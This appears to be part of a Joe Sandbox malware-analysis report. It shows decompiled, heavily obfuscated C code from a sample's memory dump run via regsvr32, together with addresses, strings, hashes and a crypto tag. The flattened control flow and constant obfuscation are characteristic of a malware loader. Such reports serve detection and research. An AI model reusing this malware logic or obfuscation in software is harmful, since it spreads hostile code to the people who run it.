				_v388 = _v388 | 0x2708e00f;
				_v388 = _v388 << 0xc;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0xebca5aa3;
				_v376 = 0x3a43eb;
				_v376 = _v376 + 0x5e30;
				_v376 = _v376 ^ 0x2d5dec97;
				_v376 = _v376 ^ 0x2d6492cf;
				_v324 = 0x965e68;
				_v324 = _v324 ^ 0x4fad172c;
				_v324 = _v324 ^ 0x4f30eea0;
				_v404 = 0x95ea8f;
				_t391 = 0x3c;
				_v404 = _v404 / _t391;
				_v404 = _v404 << 0xc;
				_v404 = _v404 | 0x93230375;
				_v404 = _v404 ^ 0xb7f3bbc9;
				_v296 = 0x950835;
				_v296 = _v296 + 0xffff217e;
				_v296 = _v296 ^ 0x0090010d;
				_v412 = 0x146e3b;
				_v412 = _v412 ^ 0xfee339d3;
				_v412 = _v412 | 0x08dab50c;
				_v412 = _v412 << 5;
				_v412 = _v412 ^ 0xdff21b2d;
				_v316 = 0x73cd3;
				_v316 = _v316 << 0xb;
				_v316 = _v316 ^ 0x39e53ce3;
				_v304 = 0x17d1c9;
				_v304 = _v304 | 0x32076b61;
				_v304 = _v304 ^ 0x32193df4;
				_v400 = 0xe22ffc;
				_v400 = _v400 * 0xf;
				_v400 = _v400 << 8;
				_v400 = _v400 >> 5;
				_v400 = _v400 ^ 0x020db90e;
				_v360 = 0x4e823d;
				_v360 = _v360 >> 7;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0x000f4c82;
				_v332 = 0x37cdc;
				_v332 = _v332 >> 0xe;
				_v332 = _v332 ^ 0x000cfe6d;
				_v392 = 0x36521e;
				_v392 = _v392 << 2;
				_v392 = _v392 ^ 0x01f25d84;
				_v392 = _v392 + 0xffff6602;
				_v392 = _v392 ^ 0x0122fac3;
				_v292 = 0x811559;
				_v292 = _v292 ^ 0x63e4ed2d;
				_v292 = _v292 ^ 0x636b0aa2;
				_v408 = 0xc9a98b;
				_v408 = _v408 ^ 0x273a7ab7;
				_t392 = 0x3d;
				_v408 = _v408 / _t392;
				_v408 = _v408 | 0xd16a0a28;
				_v408 = _v408 ^ 0xd1e35630;
				_v352 = 0x4de238;
				_v352 = _v352 ^ 0xe481f79a;
				_v352 = _v352 ^ 0xe4c0c54b;
				_v340 = 0x7e756a;
				_v340 = _v340 << 0xb;
				_v340 = _v340 ^ 0xf3ae0159;
				_v384 = 0x3029be;
				_v384 = _v384 + 0x835e;
				_v384 = _v384 ^ 0x9e5eea44;
				_v384 = _v384 ^ 0x9e65521f;
				_v364 = 0xcf8251;
				_v364 = _v364 + 0xffff400c;
				_t393 = 0x78;
				_v364 = _v364 * 0x5a;
				_v364 = _v364 ^ 0x48b0c21e;
				_v320 = 0x2b8f03;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x15cafa02;
				_v372 = 0xb0a86a;
				_v372 = _v372 ^ 0x35b8bfe6;
				_v372 = _v372 ^ 0xed8d6bf1;
				_v372 = _v372 ^ 0xd88344ec;
				_v344 = 0x8c38;
				_v344 = _v344 ^ 0x1ac013b0;
				_v344 = _v344 ^ 0x1ac5368a;
				_v348 = 0x2c1ac3;
				_v348 = _v348 >> 6;
				_v348 = _v348 ^ 0x0005c30d;
				_v300 = 0x3ae4ba;
				_v300 = _v300 >> 0xe;
				_v300 = _v300 ^ 0x00012364;
				_v396 = 0xe1901;
				_v396 = _v396 << 0xe;
				_v396 = _v396 + 0x39a8;
				_v396 = _v396 ^ 0x864e7189;
				_v368 = 0xe5c11e;
				_t394 = _v288;
				_v368 = _v368 / _t393;
				_v368 = _v368 | 0x7320cec6;
				_v368 = _v368 ^ 0x73273aba;
				_v336 = 0xf33546;
				_v336 = _v336 ^ 0x37961faf;
				_v336 = _v336 ^ 0x37663e0b;
				_v328 = 0x922129;
				_v328 = _v328 | 0xf90cd049;
				_v328 = _v328 ^ 0xf99851f2;
				_v416 = 0x9fd52c;
				_v416 = _v416 << 2;
				_v416 = _v416 * 0x22;
				_v416 = _v416 + 0xffff9e7e;
				_v416 = _v416 ^ 0x54e779e0;
				_v380 = 0x615361;
				_v380 = _v380 >> 1;
				_v380 = _v380 + 0x673e;
				_v380 = _v380 ^ 0x003e049c;
				_v308 = 0x9da5c1;
				_v308 = _v308 + 0xf72;
				_v308 = _v308 ^ 0x009db133;
				while(1) {
					L1:
					_t309 = 0xe35a561;
					do {
						while(1) {
							L2:
							_t399 = _t349 - 0x8816d6a;
							if(_t399 > 0) {
								break;
							}
							if(_t399 == 0) {
								_t325 =  *0x40f6228; // 0x0
								_t328 =  *0x40f6228; // 0x0
								_t332 =  *0x40f6228; // 0x0
								_t336 = E040E67E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
								_t397 = _t397 + 0x30;
								if(_t336 == 0) {
									L25:
									_t349 = 0xc732dcb;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								} else {
									_t349 = 0x772d3d2;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								}
							} else {
								if(_t349 == 0x200f7b2) {
									if(_v280 >= _v308) {
										_t338 = E040E2E5D( &_v284,  &_v276);
									} else {
										_t338 = E040D80C0( &_v284);
									}
									_t394 = _t338;
									_t309 = 0xe35a561;
									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
									continue;
								} else {
									if(_t349 == 0x323c58a) {
										_t364 =  *0x40f6228; // 0x0
										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
										 *((intOrPtr*)(_t364 + 4)) = _t340;
										if(_t340 == 0) {
											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
										}
										_t341 =  *0x40f6228; // 0x0
										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
											_t365 =  *0x40f6228; // 0x0
											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
										} else {
											_t349 = 0x902256d;
											while(1) {
												L1:
												_t309 = 0xe35a561;
												goto L2;
											}
										}
									} else {
										if(_t349 == 0x54cb160) {
											_t343 = E040E5779( &_v284, _t395, _v388, _v376, _v288);
											_t397 = _t397 + 0xc;
											if(_t343 != 0) {
												_t349 = 0x200f7b2;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										} else {
											if(_t349 != 0x772d3d2) {
												goto L35;
											} else {
												if(E040D6B7A(_v340, _a16, _v384,  &_v268) == 0) {
													_t390 = 0x323c58a;
												} else {
													_t390 = 0x72c7f38;
													_t346 = 1;
												}
												_t349 = 0x939e27d;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										}
									}
								}
							}
							L38:
							return _t346;
						}
						if(_t349 == 0x902256d) {
							_t394 = 0;
							E040EFE2A(_v312, _v356, 0x100,  &_v260);
							_v276 = 0;
							_t349 = 0x54cb160;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t349 == 0x939e27d) {
								E040F2B09(_v364, _v268, _v320, _v372);
								goto L25;
							} else {
								if(_t349 == 0xc732dcb) {
									E040F2B09(_v344, _v284, _v348, _v300);
									E040F2B09(_v396, _t394, _v368, _v336);
									E040F2B09(_v328, _v276, _v416, _v380);
									_t397 = _t397 + 0x18;
									_t349 = _t390;
									L34:
									_t309 = 0xe35a561;
									goto L35;
								} else {
									if(_t349 != _t309) {
										goto L35;
									} else {
										_push(_t349);
										_push(_t349);
										_t322 = E040ECCA0(1, 0x40);
										_push( &_v260);
										_push(_t322);
										_push(_v304);
										_t382 = 0xb;
										E040DE404(_v316, _t382);
										_t397 = _t397 + 0x1c;
										_t349 = 0x8816d6a;
										goto L1;
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t349 != 0x72c7f38);
					goto L38;
				}
			}

0x040ed1c6
0x040ed1cd
0x040ed1d1
0x040ed1d8
0x040ed1df
0x040ed1e6
0x040ed1ed
0x040ed1f4
0x040ed1fb
0x040ed1fc
0x040ed1fd
0x040ed202
0x040ed20d
0x040ed210
0x040ed21a
0x040ed222
0x040ed224
0x040ed22c
0x040ed231
0x040ed236
0x040ed23e
0x040ed246
0x040ed24e
0x040ed256
0x040ed25b
0x040ed260
0x040ed268
0x040ed270
0x040ed278
0x040ed280
0x040ed288
0x040ed290
0x040ed298
0x040ed2a0
0x040ed2ae
0x040ed2b1
0x040ed2b5
0x040ed2ba
0x040ed2c2
0x040ed2ca
0x040ed2d5
0x040ed2e0
0x040ed2eb
0x040ed2f3
0x040ed2fb
0x040ed303
0x040ed308
0x040ed310
0x040ed318
0x040ed31d
0x040ed325
0x040ed330
0x040ed33b
0x040ed346
0x040ed353
0x040ed357
0x040ed35c
0x040ed361
0x040ed369
0x040ed371
0x040ed376
0x040ed37b
0x040ed383
0x040ed38b
0x040ed390
0x040ed398
0x040ed3a0
0x040ed3a5
0x040ed3ad
0x040ed3b5
0x040ed3bd
0x040ed3c8
0x040ed3d5
0x040ed3e0
0x040ed3e8
0x040ed3f6
0x040ed3fb
0x040ed401
0x040ed409
0x040ed411
0x040ed419
0x040ed421
0x040ed429
0x040ed431
0x040ed436
0x040ed43e
0x040ed446
0x040ed44e
0x040ed456
0x040ed45e
0x040ed466
0x040ed473
0x040ed47b
0x040ed47f
0x040ed487
0x040ed48f
0x040ed494
0x040ed49c
0x040ed4a4
0x040ed4ac
0x040ed4b4
0x040ed4bc
0x040ed4c4
0x040ed4cc
0x040ed4d4
0x040ed4dc
0x040ed4e1
0x040ed4e9
0x040ed4f4
0x040ed4fc
0x040ed507
0x040ed50f
0x040ed51c
0x040ed524
0x040ed52c
0x040ed53a
0x040ed541
0x040ed545
0x040ed54d
0x040ed555
0x040ed55d
0x040ed565
0x040ed56d
0x040ed575
0x040ed57d
0x040ed585
0x040ed58d
0x040ed597
0x040ed59b
0x040ed5a3
0x040ed5ab
0x040ed5b3
0x040ed5b7
0x040ed5bf
0x040ed5c7
0x040ed5d2
0x040ed5dd
0x040ed5e8
0x040ed5e8
0x040ed5e8
0x040ed5ed
0x040ed5ed
0x040ed5ed
0x040ed5ed
0x040ed5f3
0x00000000
0x00000000
0x040ed5f9
0x040ed716
0x040ed726
0x040ed742
0x040ed76a
0x040ed76f
0x040ed774
0x040ed785
0x040ed785
0x040ed5e8
0x040ed5e8
0x040ed5e8
0x00000000
0x040ed5e8
0x040ed776
0x040ed776
0x040ed5e8
0x040ed5e8
0x040ed5e8
0x00000000
0x040ed5e8
0x040ed5e8
0x040ed5ff
0x040ed605
0x040ed6dd
0x040ed6ed
0x040ed6df
0x040ed6df
0x040ed6df
0x040ed6f2
0x040ed6fb
0x040ed700
0x00000000
0x040ed60b
0x040ed611
0x040ed691
0x040ed69a
0x040ed69d
0x040ed6a0
0x040ed6a3
0x040ed6a8
0x040ed6ad
0x040ed6ad
0x040ed6b0
0x040ed6b8
0x040ed8c4
0x040ed8ca
0x040ed6be
0x040ed6be
0x040ed5e8
0x040ed5e8
0x040ed5e8
0x00000000
0x040ed5e8
0x040ed5e8
0x040ed613
0x040ed619
0x040ed677
0x040ed67c
0x040ed681
0x040ed687
0x040ed5e8
0x040ed5e8
0x040ed5e8
0x00000000
0x040ed5e8
0x040ed5e8
0x040ed61b
0x040ed621
0x00000000
0x040ed627
0x040ed647
0x040ed653
0x040ed649
0x040ed64b
0x040ed650
0x040ed650
0x040ed658
0x040ed5e8
0x040ed5e8
0x040ed5e8
0x00000000
0x040ed5e8
0x040ed5e8
0x040ed621
0x040ed619
0x040ed611
0x040ed605
0x040ed8d1
0x040ed8da
0x040ed8da
0x040ed795
0x040ed87f
0x040ed887
0x040ed890
0x040ed897
0x040ed89c
0x040ed8a3
0x040ed8aa
0x00000000
0x040ed79b
0x040ed7a1
0x040ed864
0x00000000
0x040ed7a7
0x040ed7ad
0x040ed817
0x040ed82a
0x040ed845
0x040ed84a
0x040ed84d
0x040ed8b1
0x040ed8b1
0x00000000
0x040ed7af
0x040ed7b1
0x00000000
0x040ed7b7
0x040ed7ca
0x040ed7cb
0x040ed7d0
0x040ed7dc
0x040ed7dd
0x040ed7de
0x040ed7ee
0x040ed7ef
0x040ed7f4
0x040ed7f7
0x00000000
0x040ed7f7
0x040ed7b1
0x040ed7ad
0x040ed7a1
0x00000000
0x040ed8b6
0x040ed8b6
0x00000000
0x040ed8c2

Strings

8M, xrefs: 040ED411
0^, xrefs: 040ED270
yT, xrefs: 040ED592
aSa, xrefs: 040ED5AB
ju~, xrefs: 040ED429
yT, xrefs: 040ED5A3
C:, xrefs: 040ED268
-c, xrefs: 040ED3C8
}9, xrefs: 040ED79B
}9, xrefs: 040ED658
<9, xrefs: 040ED31D
>g, xrefs: 040ED5B7

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
API String ID: 0-111235429
Opcode ID: fa126b3de015471ead243443d05a5048d79ba44ab388b3667e61d9576f09e373
Instruction ID: 7124a6149fc22634a9a10edfee89a0383d5043fdce2e7d2fa2357635c1ac8267
Opcode Fuzzy Hash: fa126b3de015471ead243443d05a5048d79ba44ab388b3667e61d9576f09e373
Instruction Fuzzy Hash: 5B0241711083819FD3A8CF26C489A6BBBE1FFC4348F10891DE69A96260D7B5D959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040D57B8, Relevance: 14.4, Strings: 11, Instructions: 616
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040D57B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				void _v12;
				void _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				void* _t657;
				intOrPtr _t715;
				void* _t716;
				void* _t717;
				void* _t725;
				void* _t729;
				void* _t737;
				void* _t740;
				intOrPtr _t746;
				void* _t798;
				void* _t814;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t833;
				void* _t834;
				void* _t840;

				_push(_a24);
				_t746 = __edx;
				_push(_a20);
				_v224 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x20);
				E040EFE29(_t657);
				_v108 = 0x7f0a1;
				_t834 = _t833 + 0x20;
				_t832 = 0;
				_t740 = 0xa8b367c;
				_t816 = 0x72;
				_v108 = _v108 / _t816;
				_v108 = _v108 ^ 0x000011d4;
				_v220 = 0x3ea28;
				_v220 = _v220 | 0x6e60dce4;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x7fdd8000;
				_v272 = 0xf906dc;
				_v272 = _v272 + 0x5e9;
				_t817 = 0x7a;
				_v272 = _v272 * 0x15;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0x70614800;
				_v264 = 0x600b37;
				_v264 = _v264 / _t817;
				_v264 = _v264 ^ 0x262493f0;
				_t818 = 0x3e;
				_v264 = _v264 * 0x11;
				_v264 = _v264 ^ 0x886a01f8;
				_v260 = 0xf3d497;
				_v260 = _v260 / _t818;
				_v260 = _v260 >> 6;
				_v260 = _v260 >> 3;
				_v260 = _v260 ^ 0x000001f7;
				_v156 = 0x8d2235;
				_v156 = _v156 >> 0xe;
				_t819 = 0xe;
				_v156 = _v156 * 0x5b;
				_v156 = _v156 ^ 0x0000c87c;
				_v292 = 0xf4d;
				_v292 = _v292 + 0x4732;
				_v292 = _v292 << 0x10;
				_v292 = _v292 << 0xe;
				_v292 = _v292 ^ 0xc0000000;
				_v216 = 0x258eaf;
				_v216 = _v216 * 0x48;
				_v216 = _v216 / _t819;
				_v216 = _v216 ^ 0x00c126f1;
				_v96 = 0xf75e54;
				_v96 = _v96 + 0xffff74b2;
				_v96 = _v96 ^ 0x00f6d306;
				_v268 = 0x92da;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 + 0x1646;
				_v268 = _v268 << 0xd;
				_v268 = _v268 ^ 0x02c9e000;
				_v196 = 0xf0429c;
				_t820 = 0x3d;
				_v196 = _v196 * 0x60;
				_v196 = _v196 >> 3;
				_v196 = _v196 ^ 0x0b431f50;
				_v232 = 0x6bfae5;
				_v232 = _v232 / _t820;
				_v232 = _v232 >> 4;
				_v232 = _v232 * 0x6e;
				_v232 = _v232 ^ 0x000c2b3c;
				_v40 = 0xa24143;
				_v40 = _v40 + 0xffff9191;
				_v40 = _v40 ^ 0x00a231cd;
				_v80 = 0x435983;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000556e3;
				_v180 = 0x94eafd;
				_v180 = _v180 + 0x1d08;
				_v180 = _v180 | 0xe944a694;
				_v180 = _v180 ^ 0xe9df3ebb;
				_v228 = 0xbcce84;
				_v228 = _v228 + 0xffff815d;
				_v228 = _v228 ^ 0xe4fbb881;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x0005fd7e;
				_v112 = 0x2fdad;
				_v112 = _v112 ^ 0x4ab81af1;
				_v112 = _v112 ^ 0x4abb9e1a;
				_v64 = 0x50dc85;
				_v64 = _v64 + 0xffff4d8c;
				_v64 = _v64 ^ 0x005cdb40;
				_v52 = 0x47f34d;
				_v52 = _v52 + 0xffff898a;
				_v52 = _v52 ^ 0x004c7feb;
				_v72 = 0xc369b0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 ^ 0x4c5d6799;
				_v132 = 0xe6e6b0;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 * 0x6c;
				_v132 = _v132 ^ 0x00059f00;
				_v172 = 0x544ea4;
				_v172 = _v172 << 5;
				_v172 = _v172 | 0xc018668b;
				_v172 = _v172 ^ 0xca962b34;
				_v148 = 0x61f17d;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 + 0xffff8980;
				_v148 = _v148 ^ 0xfffa8c30;
				_v100 = 0xf619bc;
				_v100 = _v100 >> 0xa;
				_v100 = _v100 ^ 0x00008a95;
				_v200 = 0xa94e7a;
				_v200 = _v200 + 0xa696;
				_v200 = _v200 + 0xffff4550;
				_v200 = _v200 ^ 0x00a03757;
				_v208 = 0x57e0ef;
				_v208 = _v208 ^ 0x592bbff9;
				_v208 = _v208 ^ 0x4b5d2b88;
				_v208 = _v208 ^ 0x1221726f;
				_v284 = 0x804076;
				_v284 = _v284 ^ 0x9dc3529f;
				_v284 = _v284 + 0x2ad8;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0xa19e17b3;
				_v176 = 0xb506b1;
				_v176 = _v176 | 0xc528794d;
				_v176 = _v176 + 0x810e;
				_v176 = _v176 ^ 0xc5bbfa9c;
				_v184 = 0x64408f;
				_v184 = _v184 << 3;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x00066ce1;
				_v252 = 0x9e8dfe;
				_v252 = _v252 | 0x2316ff28;
				_v252 = _v252 + 0xbb4b;
				_v252 = _v252 ^ 0x205df49d;
				_v252 = _v252 ^ 0x03c75996;
				_v192 = 0x20a385;
				_v192 = _v192 ^ 0x2edbbce0;
				_v192 = _v192 >> 5;
				_v192 = _v192 ^ 0x017066cd;
				_v312 = 0x989161;
				_v312 = _v312 + 0xa008;
				_v312 = _v312 + 0x4ac;
				_v312 = _v312 | 0x9f8d4417;
				_v312 = _v312 ^ 0x9f9ed397;
				_v320 = 0x6ba986;
				_t821 = 0x4d;
				_v320 = _v320 * 0x35;
				_v320 = _v320 + 0x6b8c;
				_v320 = _v320 + 0x347b;
				_v320 = _v320 ^ 0x164ad328;
				_v236 = 0xcaa528;
				_v236 = _v236 + 0x2035;
				_v236 = _v236 | 0x7bffa27f;
				_v236 = _v236 ^ 0x7bfdb1d6;
				_v276 = 0xb040eb;
				_v276 = _v276 * 0x3a;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00065548;
				_v280 = 0xf1680b;
				_v280 = _v280 >> 0xa;
				_v280 = _v280 >> 1;
				_v280 = _v280 >> 0xd;
				_v280 = _v280 ^ 0x00049c20;
				_v288 = 0x575f50;
				_v288 = _v288 << 0xe;
				_v288 = _v288 | 0xa77b0e2e;
				_v288 = _v288 * 0x52;
				_v288 = _v288 ^ 0x6fbbe03a;
				_v296 = 0x568d1e;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 >> 6;
				_v296 = _v296 >> 9;
				_v296 = _v296 ^ 0x0008fa1d;
				_v304 = 0xd1fef6;
				_v304 = _v304 << 0x10;
				_v304 = _v304 * 0x2d;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x7c01ef7f;
				_v92 = 0xea5a63;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x4b4e4928;
				_v76 = 0xf64e35;
				_v76 = _v76 + 0xbf9b;
				_v76 = _v76 ^ 0x00fbc5d2;
				_v248 = 0xc75c6;
				_v248 = _v248 ^ 0x54d7d0af;
				_v248 = _v248 / _t821;
				_v248 = _v248 | 0x9c98695d;
				_v248 = _v248 ^ 0x9d9ac3a5;
				_v256 = 0x504a74;
				_v256 = _v256 | 0x8719e45c;
				_v256 = _v256 * 0x7b;
				_v256 = _v256 ^ 0x8d2796a4;
				_v256 = _v256 ^ 0x85162cc6;
				_v84 = 0x519e4e;
				_v84 = _v84 ^ 0x8be7953d;
				_v84 = _v84 ^ 0x8bbbe938;
				_v168 = 0x311266;
				_v168 = _v168 ^ 0x18ab2cb8;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x3478f01c;
				_v60 = 0x61fbf7;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x000e504b;
				_v240 = 0xf8ae17;
				_v240 = _v240 >> 3;
				_v240 = _v240 | 0x050ada64;
				_v240 = _v240 ^ 0x567c7cbc;
				_v240 = _v240 ^ 0x53659cbf;
				_v68 = 0xee6d4a;
				_t374 =  &_v68; // 0xee6d4a
				_t822 = 0x49;
				_v68 =  *_t374 * 0xf;
				_v68 = _v68 ^ 0x0dff5dbc;
				_v300 = 0x550c32;
				_v300 = _v300 * 0x12;
				_v300 = _v300 + 0xffff8d7f;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x0bfb5da9;
				_v124 = 0x6baac1;
				_v124 = _v124 * 0x60;
				_t823 = 0x6f;
				_v124 = _v124 / _t822;
				_v124 = _v124 ^ 0x0084cf47;
				_v188 = 0xec1707;
				_v188 = _v188 << 0xc;
				_v188 = _v188 + 0x1505;
				_v188 = _v188 ^ 0xc1795754;
				_v244 = 0xd962f7;
				_v244 = _v244 + 0xffffa966;
				_v244 = _v244 | 0x93df07c8;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x49e87f80;
				_v48 = 0x35494e;
				_v48 = _v48 / _t823;
				_v48 = _v48 ^ 0x000830fa;
				_v88 = 0x633bdd;
				_v88 = _v88 + 0xc138;
				_v88 = _v88 ^ 0x006a2257;
				_v56 = 0x559d1c;
				_v56 = _v56 + 0xffff12d8;
				_v56 = _v56 ^ 0x005735ca;
				_v104 = 0xdd1aac;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0x0dd90d21;
				_v44 = 0x4278da;
				_t824 = 0x4e;
				_v44 = _v44 * 0x42;
				_v44 = _v44 ^ 0x112c636d;
				_v116 = 0x4ec2e;
				_v116 = _v116 + 0xffff43d8;
				_v116 = _v116 ^ 0x00065017;
				_v308 = 0xc5e4c2;
				_v308 = _v308 * 0x26;
				_v308 = _v308 + 0xa26d;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x25c4a583;
				_v36 = 0x60fc2;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x011987ae;
				_v140 = 0x8a5839;
				_v140 = _v140 << 0xb;
				_v140 = _v140 / _t824;
				_v140 = _v140 ^ 0x010a1534;
				_t814 = 0x30e419;
				_v204 = 0x180842;
				_v204 = _v204 ^ 0x577ac785;
				_v204 = _v204 + 0x1256;
				_v204 = _v204 ^ 0x5761cb73;
				_v136 = 0xcc77c3;
				_v136 = _v136 | 0x2e5c8e9b;
				_t825 = 0x3c;
				_v12 = 0xc2dfee2;
				_v16 = 0x8d06406;
				_v136 = _v136 * 0x19;
				_v136 = _v136 ^ 0x93985978;
				_v144 = 0xcb98e2;
				_v144 = _v144 ^ 0x2e2af391;
				_v144 = _v144 + 0xffff95d2;
				_v144 = _v144 ^ 0x2ee989ff;
				_v152 = 0x6e8dcb;
				_v152 = _v152 * 0x64;
				_v152 = _v152 ^ 0xf6de88b0;
				_v152 = _v152 ^ 0xddf9340f;
				_v160 = 0x1f41c3;
				_v160 = _v160 / _t825;
				_v160 = _v160 ^ 0x710c49d1;
				_v160 = _v160 ^ 0x7106b0fc;
				_v164 = 0xea0060;
				_v164 = _v164 << 2;
				_t826 = 0x54;
				_v164 = _v164 * 0x51;
				_v164 = _v164 ^ 0x2820691f;
				_v212 = 0x1a562c;
				_v212 = _v212 + 0xffff6884;
				_v212 = _v212 / _t826;
				_v212 = _v212 ^ 0x000ca439;
				_v316 = 0xc049a;
				_t827 = 0x4a;
				_v316 = _v316 / _t827;
				_v316 = _v316 >> 0xd;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x000978cf;
				_v120 = 0xbc159f;
				_t828 = 0x75;
				_v120 = _v120 * 0x6f;
				_t829 = 0x3acf932;
				_v120 = _v120 / _t828;
				_v120 = _v120 ^ 0x00bb77de;
				_v128 = 0x83c7e3;
				_v128 = _v128 ^ 0x1c1c3aef;
				_v128 = _v128 ^ 0x03a71d14;
				_v128 = _v128 ^ 0x1f3d9b10;
				while(1) {
					L1:
					while(1) {
						do {
							while(1) {
								L3:
								_t840 = _t740 - 0x6051746;
								if(_t840 <= 0) {
									break;
								}
								__eflags = _t740 - 0x644521d;
								if(_t740 == 0x644521d) {
									E040F12C1(_v32, _v136, _v144, _v152, _v160);
									_t740 = 0x4160ee8;
									goto L25;
								} else {
									__eflags = _t740 - 0x8d06406;
									if(_t740 == 0x8d06406) {
										_push(_t746);
										_push(_t746);
										_t715 = E040DC5D8(_v20);
										_t746 = _v224;
										_t834 = _t834 + 0xc;
										__eflags = _t715;
										_v24 = _t715;
										_t798 = 0x26ffc0;
										_t740 =  !=  ? 0x26ffc0 : _t814;
										_t716 = 0x5dc2900;
										continue;
									} else {
										__eflags = _t740 - 0xa8b367c;
										if(__eflags == 0) {
											_t740 = 0x6051746;
											continue;
										} else {
											__eflags = _t740 - 0xc2dfee2;
											if(__eflags == 0) {
												_push(_v276);
												_push(_v236);
												_push(_v320);
												_t737 = E040DF288(_v272, _v280, E040EE1F8(0x40d13f8, _v312, __eflags), _v288,  &_v8,  &_v20, _v296, 0x40d13f8, _v304, _v28, _v92);
												_t834 = _t834 + 0x30;
												__eflags = _t737 - _v264;
												_t740 =  ==  ? _v16 : _t814;
												E040EFECB(_t734, _v76, _v248, _v256, _v84);
												L16:
												_t829 = 0x3acf932;
												L25:
												_t746 = _v224;
												_t834 = _t834 + 0xc;
												_t798 = 0x26ffc0;
											}
											goto L26;
										}
									}
								}
								L29:
								return _t832;
							}
							if(_t840 == 0) {
								_push(_v228);
								_push(_v180);
								_push(_v80);
								_t717 = E040EE1F8(0x40d13a8, _v40, __eflags);
								_push(_v72);
								_push(_v52);
								_push(_v64);
								__eflags = E040D738A(_v132, _t717, _v172, _v108,  &_v28, E040EE1F8(0x40d1318, _v112, __eflags), _v148) - _v220;
								_t740 =  ==  ? _v12 : 0x1841daf;
								E040EFECB(_t717, _v100, _v200, _v208, _v284);
								_t834 = _t834 + 0x38;
